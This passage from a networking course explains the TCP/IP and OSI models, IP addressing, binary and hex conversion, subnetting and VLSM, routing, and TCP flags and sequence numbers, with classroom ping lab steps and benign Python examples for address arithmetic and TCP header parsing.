• The Internet Layer (or Network Layer) provides the mechanism required to address and move the data from one host to the other. The primary protocol you will examine at this layer is IP (Internet Protocol).

• The Network Access Layer (or Link Layer) is where the data communication interacts with the physical medium of the network. This is the layer that does the actual sending and receiving of the data.

As you saw in Figure 1-1, as the Web page request was initiated on the host, it moved down the layers, was transmitted across the network, and moved up the layers on the Web server. These are the layers on which all network communication using TCP/IP is based. There is a different set of layers, however, called the OSI Model.

The OSI Model

The TCP/IP Model works well for TCP/IP communications, but there are many protocols and methods of communication other than TCP/IP. A standard was needed to encompass all of the communication protocols. The standard developed by the International Organization for Standardization (ISO) is called the OSI Model.

The Open Systems Interconnect (OSI) Model has seven layers, compared to the four layers of the TCP/IP Model. The seven layers of the OSI Model are:

• The Application Layer

• The Presentation Layer

• The Session Layer

• The Transport Layer

• The Network Layer

• The Data Link Layer

• The Physical Layer


network: Two or more machines interconnected for communications.

OSI: (Open Systems Interconnection) A set of internationally accepted and openly developed standards that meet the needs of network resource administration and integrated network components.


The names of these layers are fixed, as this is an agreed-upon standard. The details of each layer are as follows:

• The Application Layer is the highest layer of the OSI Model, and deals with interaction between the software and the network.

• The Presentation Layer is responsible for data services such as data compression and data encryption/decryption.

• The Session Layer is responsible for establishing, managing (such as packet size), and ending a session between two hosts.

• The Transport Layer is responsible for error control and data recovery between two hosts. Both TCP and UDP work at this layer.

• The Network Layer is responsible for logical addressing, routing, and forwarding of datagrams. IP works at this layer.

• The Data Link Layer is responsible for packaging data frames for transmission on the physical medium. Error control is added at this layer, often in the form of a Cyclic Redundancy Check (CRC). This layer is subdivided into the LLC (Logical Link Control) and MAC (Media Access Control) sublayers. The MAC sublayer is associated with the physical address of the network device, and the LLC sublayer makes the association between this physical address (such as the 48-bit MAC address if using Ethernet) and the logical address (such as the 32-bit IP address if using IP) at the Network Layer.

• The Physical Layer is responsible for the actual transmission and receipt of the data bit stream on the physical medium.

The OSI Model and the TCP/IP Model do fit together. In Figure 1-2, you can see that the two primary layers of concern in the TCP/IP Model (the Transport and Internet Layers) match directly with the Transport and Network Layers of the OSI Model, while the other two TCP/IP Model layers encompass two or more layers of the OSI Model.

Figure 1-2: A comparison of the OSI and TCP/IP Models.


packet: A block of data sent over the network transmitting the identities of the sending and receiving stations, error-control information, and message.


As the data from one host flows down the layers of the model, each layer attaches a small piece of information relevant to that layer. This attachment is called the header. For example, the Network Layer header will identify the logical addresses (such as IP addresses) used for this transmission. This process of adding a header at each layer is called encapsulating. Figure 1-3 shows a visual representation of the header and the encapsulation process.

Figure 1-3: Headers and the encapsulation process as data moves down the stack.

When the second host receives the data, and as the data moves up the layers, each header will let the host know how to handle this piece of data. After all the headers have been removed, the receiving host is left with the data as it was sent.

RFCs

With all the standards defined in the previous section, you may be asking where to go to find the standards. The answer is to the RFCs. A Request For Comments (RFC) is the industry location for standards relating to TCP/IP and the Internet. RFCs are freely available documents to read and study, and if you ever want to go directly to the source, be sure to use the RFC.

Although you will find RFCs listed all over the Internet, to view them all online go to: www.rfc-editor.org. This is the Web site with a searchable index of all RFCs. There are several RFCs you should be familiar with, and that you should know by name to look up. This way you will not have to search hundreds of responses to find what you need. The RFCs you should know are:

• The Internet Protocol (IP): RFC 791

• The Internet Control Messaging Protocol (ICMP): RFC 792

• The Transmission Control Protocol (TCP): RFC 793

• The User Datagram Protocol (UDP): RFC 768


The Function of IP

The Internet Protocol (which works at the Network layer of both the OSI and the TCP/IP models), by definition, has a simple function. IP identifies the current host—via an address—and using addressing, moves a packet of information from one host to another. Each host on the network has a unique IP address, and each packet the host sends will contain its own IP address and the IP address to which the packet is destined.

The packets are then directed, or routed, across the network, using the destination address, until they reach their final destination. The receiving host can read the IP address of the sender and send a response, if required.

Although it sounds straightforward, and does work, there are drawbacks. For instance, when packets are sent from one host to another, they may be received out of order. IP has no mechanism for dealing with that problem. Also, packets can get lost or corrupted during transmission, again a problem IP does not manage. These problems are left to an upper protocol to manage. Often that protocol will be TCP, as you will see in the following topic.

Binary, Decimal, and Hexadecimal Conversions

Even though you may be familiar with the concept of binary math, you may wish to review this section briefly. In binary, each bit has the ability to be either a 1 or a 0. In computers, these bits are stored in groups of 8. Since each bit can be either a 1 or a 0, each location is designated a power of 2. A byte, therefore, has binary values from 2^0 through 2^7. In Figure 1-4, you can see the value of each of the 8 bits in a byte.

When the bits are presented as a byte, the value of each of the 8 locations is added to present you with the decimal equivalent. For example, if all 8 bits were 1s, such as 11111111, then the decimal value would be 255 or 128+64+32+16+8+4+2+1. Here are a few other quick binary to decimal conversions:

Binary 11000000 is decimal 192 or 128+64+0+0+0+0+0+0

Binary 10000000 is decimal 128 or 128+0+0+0+0+0+0+0

Binary 10000010 is decimal 130 or 128+0+0+0+0+0+2+0

Binary 01011010 is decimal 90 or 0+64+0+16+8+0+2+0

The IP addresses that are either manually or dynamically assigned to a host are 32-bit fields, often shown as four decimal values for ease of reading. For example, a common address would be 192.168.10.1. Each number is an 8-bit binary value, or an octet. In this example, the first octet is 192, the second 168, the third 10, and the fourth 1.

Even though the fourth octet is given a decimal value of 1, it is still given an 8-bit value in IP addressing. Each bit of the 32-bit address must be represented, so the computer sees a decimal 1 in an IP address as 00000001. Keeping this in mind, the full decimal IP address of 192.168.10.1 is seen by the computer as the binary IP address 11000000.10101000.00001010.00000001.

In tools that are designed to capture and analyze network traffic, the IP address is often represented in its hexadecimal (Hex) format. The ability to view and recognize addressing in Hex format is a useful skill to have when you are working with TCP/IP. In hexadecimal format, the IP address 192.168.10.1 is C0-A8-0A-01. Following is a quick summary on Hex conversions.


To convert the decimal address 192.168.10.1 to hexadecimal, convert each of its octets, then combine the results, as follows:

1. Divide 192 by 16. The result is 12, with a remainder of 0. Because decimal 12 is the same as Hex C and decimal 0 is the same as Hex 0, decimal 192 is equal to Hex C0.

2. Divide 168 by 16. The result is 10, with a remainder of 8. Because decimal 10 is the same as Hex A and decimal 8 is the same as Hex 8, decimal 168 is equal to Hex A8.

3. Decimal 10 is the same as Hex A.

4. Decimal 1 is the same as Hex 1.

5. Combining the results of each conversion shows that decimal 192.168.10.1 is equal to Hex C0A80A01.

Another way to derive this result is to first convert from decimal to binary, then convert binary to hexadecimal four bits at a time, and finally, combine the results, as shown here:

1. Decimal 192 is the same as binary 11000000.

2. Decimal 168 is the same as binary 10101000.

3. Decimal 10 is the same as binary 00001010.

4. Decimal 1 is the same as binary 00000001.

5. Binary 1100 (the first four bits of the first octet) is the same as Hex C.

6. Binary 0000 is the same as Hex 0.

7. Binary 1010 is the same as Hex A.

8. Binary 1000 is the same as Hex 8.

9. Binary 0000 is the same as Hex 0.

10. Binary 1010 is the same as Hex A.

11. Binary 0000 is the same as Hex 0.

12. Binary 0001 is the same as Hex 1.

13. Combining the Hex equivalents shows that decimal 192.168.10.1 is equal to Hex C0A80A01.

IP Address Classes

There are five defined classes of IP addresses: Class A, Class B, Class C, Class D, and Class E. The details of each class are as follows:

• Class A IP addresses use the first 8 bits of an IP address to define the network, and the remaining 24 bits to define the host. This means there can be more than 16 million hosts in each Class A network (2^24 – 2, because all 1s and all 0s cannot be used as host addresses). All Class A IP addresses will have a first octet of 0xxxxxxx in binary format. 10.10.10.10 is an example of a Class A IP address.

• Class B IP addresses use the first 16 bits to define the network, and the remaining 16 bits to define the host. This means there can be more than 65,000 hosts in each Class B network (2^16 – 2). All Class B IP addresses will have a first octet of 10xxxxxx in binary format. 172.16.31.200 is an example of a Class B IP address.

• Class C IP addresses use the first 24 bits to define the network, and the remaining 8 bits to define the host. This means there can be only 254 hosts in each Class C network (2^8 – 2). All Class C IP addresses will have a first octet of 110xxxxx in binary format. 192.168.10.1 is an example of a Class C IP address.

• Class D IP addressing is not used for hosts, but is often used for multicasting (which will be discussed later), where there is more than one recipient. The first-octet binary value of a Class D IP address is 1110xxxx. 224.0.0.9 is an example of a Class D IP address.

• Class E IP addressing is used for experimental functions and for future use. It does have a defined first-octet binary value as well. All Class E IP addresses have a first octet binary value of 11110xxx. 241.1.2.3 is an example of a Class E IP address.

Figure 1-4: IP address classes and their first-octet values.

Private IP Addresses and Special-function IP Addresses

There are several ranges of IP addresses that are not used on the Internet. These addresses are known as private, or reserved, IP addresses. Defined in RFC 1918, any host on any network can use these addresses, but these addresses are not meant to be used on the Internet, and most routers will not forward them. By using these reserved IP addresses, organizations do not have to be as concerned with address conflicts. The defined private addresses for the three main address classes (A, B, and C) are:

• Class A: 10.0.0.0 to 10.255.255.255

• Class B: 172.16.0.0 to 172.31.255.255

• Class C: 192.168.0.0 to 192.168.255.255

In addition to the private address ranges listed, there are a few other address ranges that have other functions. The first is the range of 127.0.0.0 to 127.255.255.255. This address range is used for diagnostic purposes, with the common address of 127.0.0.1 used to identify IP on the host itself. The second range is 169.254.0.0 to 169.254.255.255. This address range is used by Microsoft to allocate addresses to hosts, for Automatic Private IP Addressing (APIPA).


The Subnet Mask

Along with an IP address, each host that uses TCP/IP has a subnet mask. The subnet mask is used during a process called ANDing to determine the network to which the host belongs. The way the mask identifies the network is by the number of bits allocated, or masked, for the network. A bit that is masked is identified with a binary value of 1.

By default, a Class A IP address has 8 bits masked to identify the network, a Class B IP address has 16 bits masked to identify the network, and a Class C IP address has 24 bits masked to identify the network. These default subnet masks use contiguous bits to create the full mask. The following table shows the default subnet masks for the three classes, first in binary, then in the more traditional dotted decimal format.

Default Subnet Masks

Class   Binary Format                          Dotted Decimal Format
A       11111111.00000000.00000000.00000000    255.0.0.0
B       11111111.11111111.00000000.00000000    255.255.0.0
C       11111111.11111111.11111111.00000000    255.255.255.0

The subnet mask can be represented in different formats. For example, one common format is to list the IP address followed by the full subnet mask, such as this: 192.168.10.1 255.255.255.0. Another option, and one that is easier to write, is to count and record the number of bits that are used as 1s in the subnet mask. For example, in the default subnet mask for Class C there are 24 bits designated as 1. So, to use the second format, list the IP address followed by a slash and the number of bits masked, such as this: 192.168.10.1/24.

Subnetting Example

In the event that you need to split a network into more than one range, such as having different buildings or floors, you will need to subdivide the network. The following example will step you through the process of splitting a network and creating the subnet mask necessary to support the resulting subnetworks.

Let’s say you have been assigned the 10.0.0.0 network with the 255.0.0.0 subnet mask and need to break this up into 12 network ranges to support, for example, the 12 major departments in your corporate building. Here’s what you should do:

1. Determine how many bits, in binary, it takes to make up the number of subnetworks you need to create. In binary, 12 is 1100, so you will need 4 bits.

2. Take 4 bits from the host side of the subnet mask and AND them to the network side, effectively changing your subnet mask from 255.0.0.0 to 255.240.0.0.

• As you know, the subnet mask tells you where the dividing line between network and host bits resides. You started with a network ID of 10.0.0.0 and subnet mask of 255.0.0.0, which in binary looks like this:

00001010.00000000.00000000.00000000 (IP address for network)

11111111.00000000.00000000.00000000 (subnet mask)

• Your dividing line is at the end of the first octet (eight bits starting from the left). You have one big network with a network ID of 10.0.0.0, a range of usable addresses from 10.0.0.1 to 10.255.255.254, and a broadcast address of 10.255.255.255.

• The new, divided network looks like this:

00001010.0000 0000.00000000.00000000 (IP address for network)

11111111.1111 0000.00000000.00000000 (subnet mask)

• Notice that the network/host dividing line is now in the middle of the second octet. All of your networks will have binary addresses that will look like this: 00001010.xxxx yyyy.yyyyyyyy.yyyyyyyy, where x represents one of the variable bits used to create your subnetworks and y represents a bit on the host side of the address.

3. Determine the subnetwork addresses by changing the value of the x bits. The first possible permutation is the 00001010.0000 network; the second is the 00001010.0001 network, and so forth. The following table lists all of the possible subnetwork addresses (notice the pattern?).

Subnetwork    Binary Address                          Decimal Address
First         00001010.0000 0000.00000000.00000000    10.0.0.0
Second        00001010.0001 0000.00000000.00000000    10.16.0.0
Third         00001010.0010 0000.00000000.00000000    10.32.0.0
Fourth        00001010.0011 0000.00000000.00000000    10.48.0.0
Fifth         00001010.0100 0000.00000000.00000000    10.64.0.0
Sixth         00001010.0101 0000.00000000.00000000    10.80.0.0
Seventh       00001010.0110 0000.00000000.00000000    10.96.0.0
Eighth        00001010.0111 0000.00000000.00000000    10.112.0.0
Ninth         00001010.1000 0000.00000000.00000000    10.128.0.0
Tenth         00001010.1001 0000.00000000.00000000    10.144.0.0
Eleventh      00001010.1010 0000.00000000.00000000    10.160.0.0
Twelfth       00001010.1011 0000.00000000.00000000    10.176.0.0
Thirteenth    00001010.1100 0000.00000000.00000000    10.192.0.0
Fourteenth    00001010.1101 0000.00000000.00000000    10.208.0.0
Fifteenth     00001010.1110 0000.00000000.00000000    10.224.0.0
Sixteenth     00001010.1111 0000.00000000.00000000    10.240.0.0

For the first network, the network ID is 10.0.0.0 with a subnet mask of 255.240.0.0. The first usable address is 10.0.0.1, and the last usable address is 10.15.255.254. The broadcast address is 10.15.255.255 (the next possible IP address would be 10.16.0.0, which is the network ID of the second network). The second network has an ID of 10.16.0.0, a usable range of 10.16.0.1 to 10.16.255.254, and a broadcast address of 10.16.255.255.

Notice that you needed only 12 networks, but you have 16. That can happen, depending on the number of networks needed. For example, if you had needed 20 networks, you would have needed to move the network/host dividing line over 5 bits to the right (20 in binary is 10100, so 5 bits must be used). In that case, you would have had a subnet mask of 255.248.0.0 (instead of the 255.240.0.0 that you used for the first example), which would have given you 32 subnetworks, even though you needed only 20. Consider it room for corporate growth!


Note that any combination of addressing can be represented in different text. For example, you may come across a resource that defines the IP address in decimal, and the subnet mask in hexadecimal. You must be able to quickly recognize the addressing as defined. Use the following task to test your ability to quickly perform these conversions.

TASK 1A-1: Layering and Address Conversions

1. Describe how layering is beneficial to the function of networking.

By using a layered model, network communications can be broken into smaller chunks. These smaller chunks can each have a specific purpose, or function, and in the event an error happens in one chunk, it is possible that only that error be addressed, instead of starting over from scratch.

2. If you have an IP address of 192.168.10.1 and a subnet mask of FF-FF-00-00, to which IP network does your computer belong? Provide both decimal and Hex notations.

In decimal, the network address is 192.168.0.0; in Hex, the network address is C0-A8-00-00.

3. If you have an IP address of C0-A8-0A-01 and a subnet mask of /16, to which IP network does your computer belong? Provide both decimal and Hex notations.

In decimal, the network address is 192.168.0.0; in Hex, the network address is C0-A8-00-00.
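The two hex conversion methods and the ANDing behind Task 1A-1, as an added Python example that is not part of the course text. It also shows the equality test a host makes on its own and the destination's network addresses, which is how it decides whether a packet is local or goes to the default gateway.

```python
"""Decimal, binary and hex views of an IPv4 address, and the AND with a mask.
Added example for the conversion steps and Task 1A-1; not part of the course text."""

HEX_DIGITS = "0123456789ABCDEF"


def octets(dotted: str) -> list:
    """Split '192.168.10.1' into [192, 168, 10, 1], rejecting anything malformed."""
    parts = [int(p) for p in dotted.split(".")]
    if len(parts) != 4 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError(f"not a dotted-decimal IPv4 address: {dotted!r}")
    return parts


def to_binary(dotted: str) -> str:
    """Each octet is written as a full 8 bits, so 1 becomes 00000001."""
    return ".".join(format(o, "08b") for o in octets(dotted))


def octet_to_hex_by_division(value: int) -> str:
    """Method 1 from the text: divide by 16; the quotient is the high hex digit,
    the remainder the low one (192 -> 12 remainder 0 -> 'C0')."""
    quotient, remainder = divmod(value, 16)
    return HEX_DIGITS[quotient] + HEX_DIGITS[remainder]


def octet_to_hex_by_nibbles(value: int) -> str:
    """Method 2 from the text: write the 8 bits, then turn each group of four
    bits into one hex digit (168 -> 1010 1000 -> 'A8')."""
    bits = format(value, "08b")
    return HEX_DIGITS[int(bits[:4], 2)] + HEX_DIGITS[int(bits[4:], 2)]


def to_hex(dotted: str, sep: str = "-") -> str:
    """192.168.10.1 -> 'C0-A8-0A-01' (sep='' gives the text's C0A80A01 form)."""
    return sep.join(octet_to_hex_by_division(o) for o in octets(dotted))


def from_hex(hexed: str) -> str:
    """'C0-A8-0A-01' (or 'C0A80A01', or colon-separated) -> '192.168.10.1'."""
    digits = hexed.replace("-", "").replace(":", "").replace(" ", "")
    if len(digits) != 8:
        raise ValueError(f"expected 8 hex digits: {hexed!r}")
    return ".".join(str(int(digits[i:i + 2], 16)) for i in range(0, 8, 2))


def prefix_to_mask(prefix: int) -> str:
    """Slash notation to dotted decimal: /16 is sixteen 1-bits from the left, 255.255.0.0."""
    if not 0 <= prefix <= 32:
        raise ValueError(f"prefix length out of range: {prefix}")
    mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF
    return ".".join(str((mask >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def network_address(dotted: str, mask: str) -> str:
    """The ANDing the text describes: every address bit AND the matching mask bit.
    Masked (1) bits survive, host (0) bits are cleared."""
    return ".".join(str(a & m) for a, m in zip(octets(dotted), octets(mask)))


def same_network(host: str, destination: str, mask: str) -> bool:
    """A host runs exactly this test before sending: equal network addresses mean
    the destination is local; otherwise the packet goes to the default gateway."""
    return network_address(host, mask) == network_address(destination, mask)


if __name__ == "__main__":
    addr = "192.168.10.1"
    print(addr, "=", to_binary(addr), "=", to_hex(addr))
    # Task 1A-1, question 2: the mask is given in hex.
    mask_q2 = from_hex("FF-FF-00-00")
    print("Q2:", network_address(addr, mask_q2), to_hex(network_address(addr, mask_q2)))
    # Task 1A-1, question 3: the address is in hex and the mask in slash notation.
    net_q3 = network_address(from_hex("C0-A8-0A-01"), prefix_to_mask(16))
    print("Q3:", net_q3, to_hex(net_q3))
```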

Routing

We will get into routing in more detail later, but we need to address the basics now. Being familiar with a network and how one host will communicate with another host within the same network, what do you think will happen if a host needs to send information to a host that is not in its network?

This is exactly the situation where routing is needed. You need to route that information from your network to the receiving host’s network. Of course, the device that makes this possible is the router. The first router you will encounter on your way out of your network is the default gateway. This is the device that your computer will send all traffic to, once it determines that the destination host is not local (on the same network as itself). After the default gateway gets a packet of information destined for host User1 on network X, it looks at its routing table (think of this as a sort of directory—telling the router that traffic destined for networks C, G, F, and X should go out interface 1, traffic destined for networks E, A, B, and R should go out interface 2, and so forth), then the router forwards the packet out through interface 1. The destination network may or may not be attached to interface 1—the router doesn’t really care at this point—it just forwards the packet on according to the information in its routing table. This process repeats from one router to the next until the packet finally reaches the router that is attached to the same network as the destination host. When the packet reaches this router, which is usually also the destination host’s default gateway, it is sent out on the network as a unicast directed to the destination host User1.

router: An interconnection device that is similar to a bridge but serves packets or frames containing certain protocols. Routers link LANs at the Network Layer.

VLSM and CIDRThe standard methods of subnet masking discussed earlier are effective; however,there are instances where further subdividing is required, or more control of theaddressing of the network is desired. In these cases, you can use either of thefollowing two options: Variable Length Subnet Masking (VLSM) or ClasslessInterdomain Routing (CIDR).

Think back to the previous example of subnet masking. In particular, let’s take acloser look at the fourth network. It was intended to be used by the IT staff; how-ever, they want to be able to break the rather large network block given to theminto smaller, more manageable blocks. Specifically, they need five smaller subnet-works to be created from their network block of 10.48.0.0 with a subnet mask of255.240.0.0.

This time, let’s represent the IP addresses and subnet masks using the slashmethod: 10.48.0.0/12. Notice the IP address stays the same, but we replace thesubnet mask with /12 to tell others that the subnet mask has 12 1s in it (which, ofcourse, corresponds to 255.240.0.0).

Now, back to the IT staff’s networking issue. You have an already subnetted net-work (10.48.0.0/12) that you would like to split into five smaller networks. Tobegin, you need to ask the same starting question: How many bits does it take tomake 5? In binary, 5 is 101, so you will need three bits. Then, add three bits tothe present subnet mask (don’t worry that it has already been subnetted before—that doesn’t matter). So, now you have 10.48.0.0/15 as your first network addressand new subnet mask.

The new variable range is 00001010.0011xxxy.yyyyyyyy.yyyyyyyy, where the binary numbers will not change, x represents the variable bits that will make up the networks, and y designates the host bits.

So, what are the new network addresses?

Subnetwork   Binary Address                        Decimal Address
First        00001010.00110000.00000000.00000000   10.48.0.0
Second       00001010.00110010.00000000.00000000   10.50.0.0
Third        00001010.00110100.00000000.00000000   10.52.0.0
Fourth       00001010.00110110.00000000.00000000   10.54.0.0
Fifth        00001010.00111000.00000000.00000000   10.56.0.0
Sixth        00001010.00111010.00000000.00000000   10.58.0.0
Seventh      00001010.00111100.00000000.00000000   10.60.0.0
Eighth       00001010.00111110.00000000.00000000   10.62.0.0


For the first network, the network ID is 10.48.0.0, the usable addresses are 10.48.0.1 to 10.49.255.254, and the broadcast address is 10.49.255.255; for the second, the network ID is 10.50.0.0, the usable addresses are 10.50.0.1 to 10.51.255.254, and the broadcast address is 10.51.255.255, and so forth. Did you notice that you have eight possible networks when you needed only five? Again, you can consider it just having more room for expansion.
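The split above, carried through in code as an added example (this is not the course's own material): it applies the course's rule for choosing how many bits to borrow (the bits needed to write the count in binary, so 5 becomes 101 and three bits), lists every resulting subnetwork with its usable range and broadcast address, and includes a helper that answers the routing question from the start of this section (is the destination inside my own network, or must the packet be handed to the default gateway?). Python's standard ipaddress module is assumed; the parent block and the count are the course's own numbers.

```python
import ipaddress

# Constructed to match the course's numbers: the IT staff's block and the
# number of subnetworks they asked for.
PARENT = ipaddress.ip_network("10.48.0.0/12")
WANTED = 5


def bits_needed(count):
    """Course rule: the number of bits needed to write `count` in binary
    (5 -> 101 -> 3 bits), which is how many mask bits to borrow."""
    return count.bit_length()


def split_network(parent, count):
    """Borrow host bits from `parent` and return every resulting subnetwork."""
    new_prefix = parent.prefixlen + bits_needed(count)
    return list(parent.subnets(new_prefix=new_prefix))


def describe(net):
    """Network ID, usable range and broadcast, plus the dotted binary form
    the course uses to show which bits are fixed and which vary."""
    return {
        "network": str(net.network_address),
        "first_usable": str(net.network_address + 1),
        "last_usable": str(net.broadcast_address - 1),
        "broadcast": str(net.broadcast_address),
        "binary": ".".join(f"{octet:08b}" for octet in net.network_address.packed),
    }


def needs_router(local_ip, subnet_mask, remote_ip):
    """True when the remote host is outside the local host's own network,
    so the packet has to go to the default gateway (a router)."""
    local_net = ipaddress.ip_interface(f"{local_ip}/{subnet_mask}").network
    return ipaddress.ip_address(remote_ip) not in local_net


if __name__ == "__main__":
    subnets = split_network(PARENT, WANTED)
    print(f"{PARENT} split for {WANTED} networks -> {len(subnets)} x /{subnets[0].prefixlen}")
    for net in subnets:
        d = describe(net)
        print(f"{d['binary']}  {net}  usable {d['first_usable']}-{d['last_usable']}  broadcast {d['broadcast']}")
    # The question from Task 1A-2: 192.168.10.23/24 reaching 192.168.11.23
    print("router needed:", needs_router("192.168.10.23", "255.255.255.0", "192.168.11.23"))
```

The eight /15 networks printed match the table above; the extra three are the "room for expansion" the course mentions. Changing WANTED to 4 borrows three bits as well under the course's rule (100 is three digits), which is the behaviour the text describes rather than the minimum mathematically required.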

X-casting

When a packet is sent from one host to another, the routing process works as described above and the packet is delivered to that single destination. However, the process is different if one host is trying to reach more than one destination, or if one message is to be received by every other host in the network. These types of communication are referred to as broadcasting, multicasting, and unicasting.

• Unicast is a term that was created after multicasting and broadcasting were already defined. A unicast is a directed communication between a single transmitter and a single receiver. This is how most communication between two hosts happens, with Host A specifically communicating with Host B.

• A broadcast is a communication that is sent out from a single transmitting host and is destined for all possible receivers on a segment (generally, everyone in the network, since the routers that direct traffic from one network to another are generally used to stop broadcasts, thereby creating broadcast domain boundaries). Broadcasting can be done for many reasons, such as locating another host. For a MAC broadcast, the broadcast address used is FF:FF:FF:FF:FF:FF. For an IP broadcast, the address used is based on the network settings. For example, if you are on network 192.168.10.0/24 the broadcast address is 192.168.10.255.

• A multicast is a communication that is sent out to a group of receivers on the network. Multicasting is often implemented as a means for directing traffic from the presenter of a videoconference to the audience. In comparison to the broadcast, which all receivers on the segment will receive, those who wish to receive a multicast must join a group to do so. Group membership is often very dynamic and controlled by a user or an application. Currently, Class D addresses are used for multicasting purposes. Remember, Class D has IP addresses in the range of 224.0.0.0 to 239.255.255.255.

TASK 1A-2
Routers and Subnetting

1. You are using a host that has an IP address of 192.168.10.23 and a subnet mask of 255.255.255.0. You are trying to reach a host with the IP address 192.168.11.23. Will you need to go through a router? Explain your response.

Yes, you will need to go through a router. Your subnet mask defines you as belonging to network 192.168.10.0, and the remote host you are trying to reach does not belong to your network.

2. Boot your computer to Windows 2000, and log on as Administrator, with a blank (null) password.


3. From the Start menu, choose Settings→Network And Dial-up Connections. Right-click the Classroom Hub interface and choose Properties.

4. Select Internet Protocol (TCP/IP) and click Properties.

5. Click the Advanced button, and verify that the IP Settings tab is displayed.

Under Default Gateways, record the IP address here:

For the LEFT side of the classroom, the Default Gateway is 172.16.0.1. For the RIGHT side, it is 172.18.0.1.

6. Select the IP address you just recorded, and click Remove. Click OK three times.

7. Open a command prompt, and ping an address that is not on your local network. For instance, if you are on the LEFT side of the classroom, you could ping an address in the 172.18.10.0 network, and if you are on the RIGHT side of the classroom, you could ping an address in the 172.16.10.0 network.

8. Observe the message you receive. The text “Destination Host unreachable” is displayed. Your computer knows that the ping packet is supposed to go to a computer that is outside your local network but it does not know how to get it there.

9. Switch to the Network And Dial-up Connections Control Panel, and display the properties of the Classroom Hub interface.

10. Select Internet Protocol (TCP/IP), click Properties, and click Advanced. On the IP Settings tab, click the Add button found in the Default Gateway area.

11. In the TCP/IP Gateway Address box, enter the IP address you recorded earlier in the task, click Add, and click OK three times.

12. Switch back to the command prompt, and try to ping the remote address again.

13. Observe the message you receive. This time, as long as the other computer’s default gateway is correctly configured, you should be successful in pinging the remote computer. This is because your computer now knows to send traffic to the router if that traffic is destined for another network. (How the routers know where to send the traffic is covered later in the course.) Contact your instructor if your ping attempt is not successful.

14. Close all open windows.

Be prepared to diagram or otherwise explain the classroom setup.

The recommended classroom layout is shown in Figure 0-1.

Students must be able to ping all computers within the classroom for the remaining tasks to work properly. If any students are not successful in the second ping attempt, help them troubleshoot the issue.


Topic 1B
Analyzing the Three-way Handshake

Although a great deal of emphasis is given to IP due to the addressing and masking issues, TCP deserves equal attention from the security professional. In addition to TCP, the other protocol that functions as a transport protocol is UDP. This topic will concentrate on TCP; however, a brief discussion on UDP is warranted. The following table provides a brief comparison of the two protocols.

Comparing TCP and UDP

TCP                      UDP
Connection-oriented      Connectionless
Slower communications    Faster communications
Considered reliable      Considered unreliable
Transport Layer          Transport Layer

TCP provides a connection-oriented means of communication, whereas UDP provides connectionless communication. The connection-oriented function of TCP means it can ensure reliable transmission, and can recover if transmission errors occur. The connectionless function of UDP means that packets are sent with the understanding they will make it to the other host, with no means of ensuring the reliability of the transmission.

UDP is considered faster because less work is done between the two hosts that are communicating. Host 1 simply sends a packet to the address of host 2. There is nothing built into UDP to provide for host 1 checking to see if host 2 received the packet, or for host 2 sending a message back to host 1, acknowledging receipt.

TCP provides the functions of connection-oriented communication by using features such as the three-way handshake, acknowledgements, and sequence numbers. In addition to these features, a significant part of TCP is the use of control flags. There are six TCP control flags in a TCP header, each with a specific meaning.

security: A condition that results from the establishment and maintenance of protective measures that ensure a state of inviolability from hostile acts or influences.


TCP Flags

The TCP flags are: SYN, ACK, FIN, RESET, PUSH, and URGENT. These flags may also be identified as S, ack, F, R, P, and urg. Each of these flags occupies the space of one bit in the header, and if they are assigned a value of 1, they are considered on. The function of each flag is identified as follows:

• The SYN, or S, flag represents the first part of establishing a connection. The synchronizing of communication will generally be in the first packet of communication.

• The ACK, or ack, flag represents acknowledgement of receipt of data from the sending host. This is sent during the second part of establishing a connection, in response to the sending host’s SYN request.

• The FIN, or F, flag represents the sender’s intentions of terminating the communication in what is known as a graceful manner.

• The RESET, or R, flag represents the sender’s intentions to reset the communication.

• The PUSH, or P, flag is used when the sending host requires data to be pushed directly to the receiving application, rather than held in a buffer until the buffer fills.

• The URGENT, or urg, flag represents that this data should take precedence over other data transmissions.

Sequence and Acknowledgement Numbers

In addition to the TCP flags, another critical issue of TCP is that of numbers: sequence and acknowledgement numbers, to be specific. Because TCP has been defined as a reliable protocol that has the ability to provide for connection-oriented communication, there must be a mechanism to provide these features. Sequence and acknowledgement numbers are what provide this.

Sequence Numbers

The sequence number is found in the TCP header of each TCP packet and is a 32-bit value. These numbers allow the two hosts a common ground for communication, and allow for the hosts to identify packets sent and received. If a large Web page requires several TCP packets for transmission, sequence numbers are used by the receiving host to reassemble the packets in the proper order and provide the full Web page for viewing.

When a host sends the request to initiate a new connection, an Initial Sequence Number (ISN) must be chosen. There are different algorithms by different vendors for the choosing of an ISN; however, RFC 793 states that the ISN is to be a 32-bit number that increments by one every 4 microseconds.

Acknowledgement Numbers

The acknowledgement number is also found in the TCP header of each TCP packet, and is also a 32-bit value. These numbers allow the two hosts to be given a receipt of data delivery. An acknowledgement number is in the packet header in response to a sequence number in the sending packet.

In the event that the sending host does not receive an acknowledgement for a transmitted packet in the defined timeframe, the sender will retransmit the packet. This is how TCP provides reliable delivery. If a packet seems to have been lost, the sender will retransmit it.
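To make the header fields from the flags and sequence/acknowledgement sections concrete, here is an added example (not the course's code) that decodes the 20-byte fixed TCP header from raw bytes, as you would read them out of a sniffer's hex pane, and re-encodes one. The flag bit positions are those of RFC 793 (the six flags the course lists occupy the low six bits of the offset/flags word). The sample header is constructed for the example and is not a real capture; its checksum is left at zero because computing one needs the IP pseudo-header, which this example does not model.

```python
import struct

# Flag bits in the low byte of the TCP data-offset/flags word (RFC 793):
# the six flags the course lists, from bit 0 upward.
FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04,
             "PSH": 0x08, "ACK": 0x10, "URG": 0x20}

# Network byte order: src port, dst port, seq, ack, offset/flags, window,
# checksum, urgent pointer. calcsize gives 20, the minimum TCP header.
HEADER_FMT = "!HHIIHHHH"
HEADER_LEN = struct.calcsize(HEADER_FMT)


def parse_tcp_header(raw):
    """Decode the fixed TCP header into a dict; flags come back as names."""
    if len(raw) < HEADER_LEN:
        raise ValueError(f"need at least {HEADER_LEN} bytes, got {len(raw)}")
    (sport, dport, seq, ack, off_flags,
     window, checksum, urg_ptr) = struct.unpack(HEADER_FMT, raw[:HEADER_LEN])
    return {
        "src_port": sport,
        "dst_port": dport,
        "seq": seq,                                  # 32-bit sequence number
        "ack": ack,                                  # 32-bit acknowledgement number
        "data_offset": (off_flags >> 12) * 4,        # header length in bytes
        "flags": [name for name, bit in FLAG_BITS.items() if off_flags & bit],
        "window": window,
        "checksum": checksum,
        "urgent_pointer": urg_ptr,
    }


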